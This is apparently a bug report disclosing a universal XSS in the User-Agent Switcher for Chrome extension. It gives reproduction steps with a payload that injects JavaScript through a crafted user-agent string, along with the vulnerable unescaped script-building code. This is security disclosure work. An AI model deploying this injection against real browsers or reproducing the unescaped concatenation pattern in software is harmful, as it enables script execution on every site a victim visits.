Summary: UXSS using User-Agent Switcher for Chrome
Steps to reproduce:
Install
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg/related
Go to any web page (e.g. shhnjk.com) and open devtools
Change JS context to User-Agent Switcher's content script and run
chrome.extension.sendRequest({action: "add_ua", name: 'Edge', user_agent: "Edge'+alert(origin)+'", append_to_default_ua: true, indicator: 'Edge'})
Now changes user agent to Default -> Edge
Go to google.com and observe an alert
Browser/OS: Chrome/Windows 10
Attack scenario:
Compromised renderer can call content script APIs. There is a message listener in background script, and it allows setting arbitrary User Agent string.
else if (request.action == "add_ua") {
addCustomUAOption(request.name, request.user_agent, request.append_to_default_ua, request.indicator);
sendResponse({
result: "success"
});
}
When this new user agent is set, content script injected in <all_urls> will overwrite navigator.userAgent using followinf script.
var a = document.createElement("script");
a.type = "text/javascript";
a.innerText += "Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return '" + (b.append_to_default_ua ? navigator.userAgent + ' ' + b.ua_string : b.ua_string) + "'; } });";
a.innerText += "Object.defineProperty(window.navigator, 'vendor', { get: function(){ return '" + (b.vendor) + "'; } });";
if (b.platform) {
a.innerText += "Object.defineProperty(window.navigator, 'platform', { get: function(){ return '" + (b.platform) + "'; } });";
document.documentElement.insertBefore(a, document.documentElement.firstChild)
XSS everywhere. When any website tries to call navigator.userAgent, new overwritten function will be called. And since many websites calls navigator.userAgent to detect user agent, this is an UXSS.